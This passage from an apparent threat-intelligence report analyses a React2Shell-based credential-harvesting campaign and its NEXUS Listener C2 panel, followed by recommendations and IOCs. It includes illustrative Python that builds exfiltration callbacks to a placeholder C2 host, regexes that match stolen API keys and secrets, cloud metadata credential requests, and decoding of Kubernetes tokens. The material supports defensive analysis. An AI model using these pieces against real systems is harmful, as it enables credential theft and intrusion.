This is consistent with a staged payload delivery model. The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script. Upon execution, the harvesting script iterates through several phases to collect various data from the compromised system, outlined below:
environ – Dump running process environment variables
jsenv – Extract JSON-parsed environment from JS runtime
ssh – Harvest SSH private keys and authorized_keys
tokens – Pattern-match and extract credential strings
proc_all – Aggregate all process environment variables
The framework leverages a meta.json file that tracks execution state:
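The contents of meta.json were not reproduced in the report, so the following sketch is purely hypothetical: field names such as host_id, phases, status, and ts are invented here to illustrate how phase-state tracking of this kind typically works.

```python
import json
import time

# Hypothetical schema -- the report confirms only that meta.json tracks
# execution state; every field name below is an assumption.
PHASES = ["environ", "jsenv", "ssh", "tokens", "proc_all"]

def mark_phase_done(state, phase):
    state.setdefault("phases", {})[phase] = {"status": "done", "ts": int(time.time())}
    return state

state = {"host_id": "eba9ee1e4"}  # placeholder ID borrowed from the dropper name
for phase in PHASES:
    mark_phase_done(state, phase)

# Persisted alongside the dropper so a re-run could skip completed phases:
serialized = json.dumps(state)
```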
Following the completion of each collection phase, an HTTP request is made back to the C2 server running the NEXUS Listener component. In most cases, the callback takes place on port 8080 and contains the following parameters:
Hostname
Phase
ID
Some examples of the full URL, executed after each phase:
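The actual callback URLs are withheld; only the port and the three parameter names are sourced from the observed activity. A hypothetical reconstruction, using a placeholder documentation-range address and an assumed flat query-string layout:

```python
from urllib.parse import urlencode

# Placeholder C2 address (RFC 5737 documentation range) -- real infrastructure
# is withheld. Port 8080 and the hostname/phase/id parameters come from the
# observed callbacks; the path and parameter order are assumptions.
C2 = "http://203.0.113.10:8080"
PHASES = ["environ", "jsenv", "ssh", "tokens", "proc_all"]

def callback_url(hostname, phase, victim_id):
    return f"{C2}/?" + urlencode({"hostname": hostname, "phase": phase, "id": victim_id})

# One check-in per completed phase:
urls = [callback_url("web-01", p, "eba9ee1e4") for p in PHASES]
```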
After data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is stored in a database and made available via a web application called NEXUS Listener. In most instances, the web application front end is protected with a password, the prompt for which can be seen in Figure 1.
Figure 1. NEXUS Listener login prompt.
In at least one instance, the web application was left exposed, revealing a wealth of information, including the inner workings of the application itself, as well as the data that was harvested from compromised systems.
Figure 2. NEXUS Listener homepage with statistics.
The application lists several statistics, including the number of hosts compromised and the total number of credentials of each type successfully extracted from those hosts, as well as the uptime of the application itself. In this case, the automated exploitation and harvesting framework successfully compromised 766 hosts within a 24-hour period.
Figure 3. NEXUS Listener victims list.
The web application allows a user to browse through all of the compromised hosts. A given host can then be selected, bringing up a menu with all of the exfiltrated data corresponding to each phase of the harvesting script.
The observed NEXUS Listener instances display “v3” in the title, indicating the application has gone through various stages of development before reaching the currently deployed version.
Analysis
Cisco Talos was able to obtain data from an unauthenticated NEXUS Listener instance. The following is an analysis of that data, broken down by credential category.
Credential Categories
Environment secrets and API keys
The “environ.txt” and “jsenv.txt” files contain the runtime environment of each compromised application process, exposing a variety of third-party API credentials:
AI platform keys: OpenAI, Anthropic, NVIDIA NIM, OpenRouter, Tavily
Payment processors: Stripe live secret keys (sk_live_*)
Communication platforms: SendGrid, Brevo/Sendinblue transactional email API keys, Telegram bot tokens and webhook secrets
Source control: GitHub personal access tokens, GitLab tokens
Database connection strings: Full DATABASE_URL values including hostnames, ports, usernames, and cleartext passwords
Custom application secrets: Auth tokens, dashboard passwords, webhook signing secrets — often high-entropy hex or Base64 strings
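The “tokens” phase pattern-matches credential strings; the campaign’s actual regexes were not published, but the same idea can be sketched defensively using the publicly documented prefixes of the key types listed above:

```python
import re

# Well-known public prefixes for the credential types named above -- these
# patterns are illustrative, not the attacker's actual ones.
PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "database_url": re.compile(r"[a-z+]+://[^:\s]+:[^@\s]+@[^/\s]+"),
    "github_pat": re.compile(r"ghp_[0-9A-Za-z]{36}"),
    "stripe_live_key": re.compile(r"sk_live_[0-9A-Za-z]{24,}"),
}

def classify_secrets(text):
    """Return the credential types whose patterns appear in the text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))

# A fabricated environment dump of the kind found in environ.txt/jsenv.txt:
env_dump = (
    "DATABASE_URL=postgres://app:s3cret@db.internal:5432/prod\n"
    "STRIPE_SECRET_KEY=sk_live_" + "x" * 24
)
print(classify_secrets(env_dump))  # ['database_url', 'stripe_live_key']
```

Running the same patterns over your own environment dumps and repositories is a cheap way to find what an attacker running this phase would find.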
SSH private keys
Present in 78% of hosts, the “ssh.txt” files contain complete PEM-encoded private keys (both ED25519 and RSA formats) along with authorized_keys entries. These keys enable lateral movement to any other system that trusts the compromised host’s key identity — a particularly severe finding for organizations with shared key infrastructure or bastion-host architectures.
Cloud credential harvesting
The “aws_full.txt” and “cloud_meta.txt” phases attempt to query the AWS Instance Metadata Service (IMDS), GCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated temporary credentials — credentials that carry whatever permissions were granted to the instance role, which in misconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read access.
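The difference that IMDSv2 enforcement closes is visible in the request shapes: IMDSv1 needs only one unauthenticated GET, while IMDSv2 requires a session token obtained via PUT before any read. A sketch using the standard AWS metadata endpoints (requests are constructed here but deliberately not sent):

```python
from urllib.request import Request

IMDS = "http://169.254.169.254"  # standard link-local metadata address

# IMDSv1: a single unauthenticated GET returns role credentials -- this is
# the one-shot pattern that automated harvesters abuse.
v1_request = Request(f"{IMDS}/latest/meta-data/iam/security-credentials/")

# IMDSv2: a session token must first be fetched with a PUT...
token_request = Request(
    f"{IMDS}/latest/api/token",
    method="PUT",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
)
# ...and then presented on every metadata read, defeating one-shot,
# unauthenticated harvesting (the token value below is a placeholder).
credentials_request = Request(
    f"{IMDS}/latest/meta-data/iam/security-credentials/",
    headers={"X-aws-ec2-metadata-token": "<token returned by the PUT>"},
)
```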
Kubernetes service account tokens
The “k8s.txt” phase targets containerized workloads, attempting to read the default service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker to enumerate cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on RBAC configuration.
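A stolen service account token is a JWT, so decoding its payload (without verification) immediately tells an attacker which namespace and account it grants, which scopes any follow-on RBAC abuse. A minimal sketch, exercised with a fabricated, non-functional token:

```python
import base64
import json

SA_TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"

def jwt_claims(token):
    """Decode a JWT's payload WITHOUT signature verification -- enough to see
    which namespace/service account a stolen token belongs to."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Fabricated token payload for illustration (the subject name is invented):
fake_payload = base64.urlsafe_b64encode(
    json.dumps({"sub": "system:serviceaccount:prod:ci-runner"}).encode()
).rstrip(b"=").decode()
claims = jwt_claims(f"eyJhbGciOiJSUzI1NiJ9.{fake_payload}.sig")
print(claims["sub"])
```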
Docker container intelligence
For hosts running Docker (approximately 6% of the dataset), the “docker.txt” phase enumerates all running containers, their images, exposed ports, network configurations, mount points, and environment variables. Notable services observed include phpMyAdmin instances, n8n workflow automation, and internal administrative dashboards — all of which are high-value targets for follow-on access.
Shell command history
Command history files reveal operator behavior on compromised systems and other information that could be useful for post-compromise activity. Observed patterns include:
MySQL client invocations with explicit credentials: mysql -u root -p
Database service management: /etc/init.d/mysqld restart
Implications
Credential compromise and account takeover: Every credential in this dataset should be considered fully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys with broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral movement within AWS organizations. Database connection strings with cleartext passwords provide direct access to application data stores containing user personally identifiable information (PII), financial records, or proprietary data.
Lateral movement via SSH: The large corpus of exposed SSH private keys creates a persistent lateral movement risk that survives the rotation of application credentials. If any of these keys are reused across systems (a common operational practice), the attacker retains access to those systems even after the initial compromise is detected and remediated.
Supply chain risk: Several hosts show evidence of package registry authentication files (“pkgauth.txt”), including npm and pip configuration with registry credentials. Compromised package registry tokens could enable a supply chain attack — publishing malicious versions of packages under a legitimate maintainer’s identity.
Data aggregation and intelligence value: Beyond the immediate operational value of individual credentials, the aggregate dataset represents a detailed map of the victim organizations’ infrastructure: what services they run, how they’re configured, what cloud providers they use, and what third-party integrations are in place. This intelligence has significant value for crafting targeted follow-on attacks, social engineering campaigns, or selling access to other threat actors.
Reputational and regulatory exposure: For any organization whose data appears in this set, there are serious compliance implications. Database credentials exposing PII trigger breach notification requirements under GDPR, CCPA, and sector-specific regulations. Payment-processing organizations whose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform API keys can result in significant unauthorized usage charges in addition to the security risk.
Recommendations
Audit getServerSideProps and getStaticProps implementations: Ensure no secrets or server-only environment variables are passed as props to client components.
Enforce NEXT_PUBLIC_ prefix discipline: Only variables that are intentionally public should carry this prefix. Audit all variables for misclassification.
Rotate all credentials immediately if any overlap with the described victim profile is suspected.
Implement IMDSv2 enforcement on all AWS EC2 instances to require session-oriented metadata queries, blocking unauthenticated metadata service abuse.
Segment SSH keys: Avoid reusing SSH key pairs across different systems or environments.
Enable cloud provider secret scanning: AWS, GitHub, and others offer native secret scanning that can detect and alert on committed or exposed credentials.
Deploy runtime application self-protection (RASP) or a WAF rule set tuned for Next.js-specific attack patterns, particularly those targeting SSR data injection points.
Audit container environments for least-privilege. Application containers should not have access to the host SSH agent, host filesystem mounts containing sensitive data, or overly permissive IAM instance roles.
Coverage
SNORT® ID for CVE-2025-55182, aka React2Shell: 65554
Indicators of compromise (IOCs)
Organizations should investigate for the following artifacts on web application hosts:
Unexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh)
nohup invocations in process listings not associated with known application workflows
Unusual outbound HTTP/S connections from application containers to non-production endpoints
Evidence of __NEXT_DATA__ containing server-side secrets in rendered HTML
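A quick triage sketch for the first indicator. The 9-hex-character filename pattern is inferred from the two published sample names (.eba9ee1e4.sh, .e40e7da0c.sh), so the length range below is deliberately loose and may need widening:

```python
import re
from pathlib import Path

# Naming pattern inferred from the published samples -- treat the hex length
# as an assumption, not a confirmed constant of the campaign.
DROPPER_NAME = re.compile(r"^\.[0-9a-f]{8,12}\.sh$")

def suspicious_tmp_scripts(tmp_dir="/tmp"):
    """List dot-prefixed, hex-named shell scripts like /tmp/.eba9ee1e4.sh."""
    return sorted(p.name for p in Path(tmp_dir).iterdir()
                  if DROPPER_NAME.match(p.name))
```

Pair this with a process-listing check for `nohup sh /tmp/.*.sh` invocations, since the scripts may have been deleted after execution while the processes persist.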
IOCs for this threat are also available in our GitHub repository.